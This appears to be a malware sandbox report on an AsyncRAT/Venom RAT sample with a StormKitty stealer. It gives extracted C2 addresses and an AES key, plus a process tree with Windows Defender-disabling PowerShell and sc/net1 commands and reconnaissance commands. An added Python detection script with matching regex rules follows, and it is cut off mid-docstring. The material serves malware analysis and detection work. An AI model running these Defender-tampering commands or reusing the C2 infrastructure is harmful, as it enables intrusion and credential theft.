Resubmissions

13/01/2025, 01:08 UTC

250113-bhl5gs1kfl 10

12/01/2025, 12:45 UTC

250112-pzgszsspby 10

10/01/2025, 15:08 UTC

250110-shv6tszqaq 10

Analysis

  • max time kernel
    822s
  • max time network
    725s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10/01/2025, 15:08 UTC

General

  • Target

    Client.exe

  • Size

    74KB

  • MD5

    5b1f7f243956595af2cef317a273275e

  • SHA1

    f6bcfbc268be9c272559f7345d1684b27d983fe1

  • SHA256

    c29bc00a3915c04961b3a25c499c3c9f43c33c6b484c00df4a5c8b3695344bea

  • SHA512

    1979d0564afeeaec460c86179707ff29da602ab1c66958453c52816f99e863665cdb0f08bb5b540615c8f54b752dc8ba8bb655a15b52eb5a0c5d4d9d33dccfbf

  • SSDEEP

    1536:EUzkcx4VHsC0SPMV7e9VdQuDI6H1bf/0dmIQzc2LVclN:EUwcx4GfSPMV7e9VdQsH1bfEmIQPBY

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

127.0.0.1:4449

127.0.0.1:8000

127.0.0.1:64240

193.161.193.99:4449

193.161.193.99:8000

193.161.193.99:64240

Mutex

oklwlbhdlrw

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

  • aes.plain

    Ik28hrqPT2p4HG0fuMz1FInI5TH7YVQz

Signatures

  • AsyncRat

    AsyncRAT is a remote access tool written in C#, designed to remotely monitor and control other computers.

  • Asyncrat family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and browsing history.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs a powershell.exe command.

  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Network Service Discovery 1 TTPs 1 IoCs

    Attempts to gather information on the host's network.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempts to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the victim system's language in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempts to get a listing of network connections.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses a command-line utility to view the network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 64 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 45 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • UAC bypass
    • Checks computer location settings
    • Accesses Microsoft Outlook profiles
    • Checks whether UAC is enabled
    • Drops desktop.ini file(s)
    • Suspicious use of SetThreadContext
    • Drops file in Program Files directory
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • System policy modification
    • outlook_office_path
    • outlook_win_path
    PID:1652
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Boot or Logon Autostart Execution: Active Setup
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      PID:748
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4448 HVNC_MUTEX
      2⤵
        PID:4840
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4448 HVNC_MUTEX
        2⤵
        • System Location Discovery: System Language Discovery
        PID:952
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4644
        • C:\Windows\system32\PING.EXE
          ping google.com
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3184
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/
        2⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:6324
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8a61c46f8,0x7ff8a61c4708,0x7ff8a61c4718
          3⤵
            PID:6340
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
            3⤵
              PID:3240
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:544
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
              3⤵
                PID:4744
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
                3⤵
                  PID:392
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
                  3⤵
                    PID:3088
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
                    3⤵
                      PID:4976
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:8
                      3⤵
                        PID:6776
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:8
                        3⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3584
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
                        3⤵
                          PID:5216
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
                          3⤵
                            PID:5224
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
                            3⤵
                              PID:5892
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
                              3⤵
                                PID:5900
                            • C:\Windows\explorer.exe
                              "C:\Windows\explorer.exe"
                              2⤵
                                PID:216
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4448 HVNC_MUTEX
                                2⤵
                                  PID:1960
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4448 HVNC_MUTEX
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:368
                                • C:\Windows\explorer.exe
                                  "C:\Windows\explorer.exe"
                                  2⤵
                                    PID:1072
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4449 HVNC_MUTEX
                                    2⤵
                                      PID:704
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4449 HVNC_MUTEX
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2568
                                    • C:\Windows\SYSTEM32\cmd.exe
                                      "cmd.exe"
                                      2⤵
                                        PID:5704
                                        • C:\Windows\system32\systeminfo.exe
                                          systeminfo
                                          3⤵
                                          • Gathers system information
                                          PID:5748
                                        • C:\Windows\system32\HOSTNAME.EXE
                                          hostname
                                          3⤵
                                            PID:2304
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic logicaldisk get caption,description,providername
                                            3⤵
                                            • Collects information from the system
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5136
                                          • C:\Windows\system32\net.exe
                                            net user
                                            3⤵
                                              PID:5164
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 user
                                                4⤵
                                                  PID:5168
                                              • C:\Windows\system32\query.exe
                                                query user
                                                3⤵
                                                  PID:5184
                                                  • C:\Windows\system32\quser.exe
                                                    "C:\Windows\system32\quser.exe"
                                                    4⤵
                                                      PID:5988
                                                  • C:\Windows\system32\net.exe
                                                    net localgroup
                                                    3⤵
                                                      PID:1512
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 localgroup
                                                        4⤵
                                                          PID:5212
                                                      • C:\Windows\system32\net.exe
                                                        net localgroup administrators
                                                        3⤵
                                                          PID:6160
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 localgroup administrators
                                                            4⤵
                                                              PID:6300
                                                          • C:\Windows\system32\net.exe
                                                            net user guest
                                                            3⤵
                                                              PID:6024
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 user guest
                                                                4⤵
                                                                  PID:6044
                                                              • C:\Windows\system32\net.exe
                                                                net user administrator
                                                                3⤵
                                                                  PID:1556
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 user administrator
                                                                    4⤵
                                                                      PID:3364
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic startup get caption,command
                                                                    3⤵
                                                                      PID:6828
                                                                    • C:\Windows\system32\tasklist.exe
                                                                      tasklist /svc
                                                                      3⤵
                                                                      • Enumerates processes with tasklist
                                                                      PID:996
                                                                    • C:\Windows\system32\ipconfig.exe
                                                                      ipconfig /all
                                                                      3⤵
                                                                      • Gathers network information
                                                                      PID:4160
                                                                    • C:\Windows\system32\ROUTE.EXE
                                                                      route print
                                                                      3⤵
                                                                        PID:4776
                                                                      • C:\Windows\system32\ARP.EXE
                                                                        arp -a
                                                                        3⤵
                                                                        • Network Service Discovery
                                                                        PID:1760
                                                                      • C:\Windows\system32\NETSTAT.EXE
                                                                        netstat -ano
                                                                        3⤵
                                                                        • System Network Connections Discovery
                                                                        • Gathers network information
                                                                        PID:3068
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc query type= service state= all
                                                                        3⤵
                                                                        • Launches sc.exe
                                                                        PID:1500
                                                                      • C:\Windows\system32\netsh.exe
                                                                        netsh firewall show state
                                                                        3⤵
                                                                        • Modifies Windows Firewall
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        PID:1176
                                                                      • C:\Windows\system32\netsh.exe
                                                                        netsh firewall show config
                                                                        3⤵
                                                                        • Modifies Windows Firewall
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        PID:4340
                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                      2⤵
                                                                      • System Network Configuration Discovery: Wi-Fi Discovery
                                                                      PID:3236
                                                                      • C:\Windows\system32\chcp.com
                                                                        chcp 65001
                                                                        3⤵
                                                                          PID:5276
                                                                        • C:\Windows\system32\netsh.exe
                                                                          netsh wlan show profile
                                                                          3⤵
                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                          PID:6984
                                                                        • C:\Windows\system32\findstr.exe
                                                                          findstr All
                                                                          3⤵
                                                                            PID:2508
                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                          "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                          2⤵
                                                                            PID:540
                                                                            • C:\Windows\system32\chcp.com
                                                                              chcp 65001
                                                                              3⤵
                                                                                PID:4508
                                                                              • C:\Windows\system32\netsh.exe
                                                                                netsh wlan show networks mode=bssid
                                                                                3⤵
                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                PID:5492
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                               "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc ...
                                                                              2⤵
                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                              PID:6872
                                                                              • C:\Windows\system32\sc.exe
                                                                                "C:\Windows\system32\sc.exe" qc windefend
                                                                                3⤵
                                                                                • Launches sc.exe
                                                                                PID:4464
                                                                              • C:\Windows\system32\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                                3⤵
                                                                                  PID:6676
                                                                                • C:\Windows\system32\whoami.exe
                                                                                  "C:\Windows\system32\whoami.exe" /groups
                                                                                  3⤵
                                                                                    PID:6580
                                                                                  • C:\Windows\system32\net1.exe
                                                                                    "C:\Windows\system32\net1.exe" start TrustedInstaller
                                                                                    3⤵
                                                                                      PID:6544
                                                                                  • C:\Windows\explorer.exe
                                                                                    "C:\Windows\explorer.exe"
                                                                                    2⤵
                                                                                    • Modifies registry class
                                                                                    PID:1664
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4449 HVNC_MUTEX
                                                                                    2⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5444
                                                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                  1⤵
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:2768
                                                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                  1⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:4924
                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                  1⤵
                                                                                    PID:4168
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:4076
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Client.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\Client.exe
                                                                                      1⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3332
                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                      1⤵
                                                                                        PID:5388
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                                                                                          2⤵
                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:5116
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            "C:\Windows\system32\sc.exe" qc windefend
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4076
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                                            3⤵
                                                                                              PID:1140
                                                                                            • C:\Windows\system32\whoami.exe
                                                                                              "C:\Windows\system32\whoami.exe" /groups
                                                                                              3⤵
                                                                                                PID:3640
                                                                                              • C:\Windows\system32\net1.exe
                                                                                                "C:\Windows\system32\net1.exe" stop windefend
                                                                                                3⤵
                                                                                                  PID:4036
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                                                                                  3⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:3876
                                                                                            • C:\Windows\system32\NOTEPAD.EXE
                                                                                              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\UnprotectDisconnect.txt
                                                                                              1⤵
                                                                                              • Opens file in notepad (likely ransom note)
                                                                                              PID:3152
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Client.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\Client.exe
                                                                                              1⤵
                                                                                                PID:2440
                                                                                              • C:\Windows\system32\NOTEPAD.EXE
                                                                                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New Text Document.txt
                                                                                                1⤵
                                                                                                  PID:3588
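The process tree above is the raw material a detection engineer turns into rules: a Defender service being reconfigured and stopped under a TrustedInstaller parent (`sc config windefend depend= RpcSs-TOGGLE`, `net1 stop windefend`, the `ToggleDefender` script pulled from a Volatile Environment key), encoded PowerShell, `net1 start TrustedInstaller`, a WiFi survey with `netsh wlan show networks`, and a `cvtres.exe` launch whose arguments line up with the extracted config (botnet name, C2 hosts, port, mutex), which is not how a .NET resource converter is ever invoked. The Python below is an added example, not tria.ge's code or anything from the sample: it runs command-line rules over (depth, command line) pairs copied from the tree and pulls the IPv4 literals out of the `cvtres.exe` line so they can be compared with the config. Rule names, severities and regexes are this example's own; the `-enc` payload is not on the page, so a placeholder stands in for it.

```python
"""Command-line rules over a sandbox process tree (added example, not tria.ge code)."""
import re
from dataclasses import dataclass

# Constructed sample: (depth, command line) pairs copied from the report's process tree.
# The -enc payload is elided on the page, so "<elided>" is a placeholder, not the real blob.
SAMPLE_TREE = [
    (3, r'netsh wlan show networks mode=bssid'),
    (2, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc <elided>'),
    (3, r'"C:\Windows\system32\sc.exe" qc windefend'),
    (3, r'"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"'),
    (3, r'"C:\Windows\system32\whoami.exe" /groups'),
    (3, r'"C:\Windows\system32\net1.exe" start TrustedInstaller'),
    (2, r'"C:\Windows\explorer.exe"'),
    (2, r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4449 HVNC_MUTEX'),
    (1, r'C:\Windows\servicing\TrustedInstaller.exe'),
    (2, r"powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}"),
    (3, r'"C:\Windows\system32\net1.exe" stop windefend'),
    (3, r'"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE'),
]

# Rule names and severities are this example's own, not tria.ge signature names.
# "sc qc windefend" is deliberately not matched: querying the service is not tampering.
RULES = [
    ("defender_service_tamper", "high",
     re.compile(r'\b(sc|net1?)(\.exe)?"?\s+(config|stop|delete)\s+windefend\b', re.I)),
    ("defender_toggle_script", "high",
     re.compile(r'\bToggleDefender\b', re.I)),
    ("encoded_powershell", "medium",
     re.compile(r'powershell(\.exe)?"?.*\s-e(nc|ncodedcommand|c)?\s', re.I)),
    ("trustedinstaller_start", "medium",
     re.compile(r'\bnet1?(\.exe)?"?\s+start\s+trustedinstaller\b', re.I)),
    ("wifi_discovery", "low",
     re.compile(r'\bnetsh(\.exe)?"?\s+wlan\s+show\b', re.I)),
    # cvtres.exe converts .res files to COFF objects; an IPv4 literal on its
    # command line means something else is running inside that image.
    ("build_tool_with_socket_args", "high",
     re.compile(r'\\cvtres\.exe"?\s+\S+\s+(\d{1,3}\.){3}\d{1,3}', re.I)),
    ("privilege_enumeration", "low",
     re.compile(r'\bwhoami(\.exe)?"?\s+/groups\b', re.I)),
]

IPV4 = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    depth: int
    cmdline: str


def scan(tree):
    """Apply every rule to every command line; one Finding per (rule, line) hit."""
    findings = []
    for depth, cmdline in tree:
        for name, severity, rx in RULES:
            if rx.search(cmdline):
                findings.append(Finding(name, severity, depth, cmdline))
    return findings


def summarize(findings):
    """Hits per rule, the view an analyst wants before reading individual lines."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


def socket_args(cmdline):
    """Sorted, de-duplicated IPv4 literals on a command line.

    For the cvtres.exe line these are the hosts the injected code will dial,
    so they should be checked against the C2 list in the extracted config.
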